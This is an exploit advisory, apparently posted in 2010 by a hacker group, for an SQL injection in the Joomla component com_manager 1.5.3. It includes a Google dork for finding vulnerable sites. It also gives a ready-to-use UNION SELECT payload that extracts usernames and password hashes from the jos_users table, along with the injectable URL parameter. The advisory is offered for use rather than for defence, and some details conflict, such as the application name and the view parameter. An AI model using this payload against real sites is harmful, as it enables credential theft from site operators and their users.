----------------------------------------------------------------------- Joomla Component com_manager 1.5.3 (id) SQL Injection Vulnerability ----------------------------------------------------------------------- Author : Islam DefenDers Mr.HaMaDa Site : http://MiXaTy.com Date : April, 15-2010 Location : Egyption HackEr ---------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Egyption HackEr Vendor : http://MixaTy.com Version : 1.5.3 Other versions may also be affected Google Dork : inurl:com_manager Intellectual Property allows independent real estate agents, brokers, or property management companies to upload and maintain property listings for sale, for rent and for lease. Upload photos, add categories, sub-categories, agent profiles, company profiles. Search with an advanced Google Map-Ajax-based map interface. Allow users to save and manage favorite properties. Quickly customize colors, filters, galleries and more! ---------------------------------------------------------------- Exploitz: ~~~~~~~ -999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users-- SQLi p0c: ~~~~~~~ http://127.0.0.1/[path]/index.php?option=com_manager&view=flight&Itemid=[SQL] ---------------------------------------------------------------- HaMaDa SCoOoRPioN - ViRuSMaN - DR.BaHy - Mixaty TeaM - Islam DefenDers TeaM ---------------------------------------------------------------- Contact: ~~~~ Site: www.mixaty.com email: hackereg@hotmail.com ________________________________ Hotmail: Trusted email with powerful SPAM protection. Sign up now.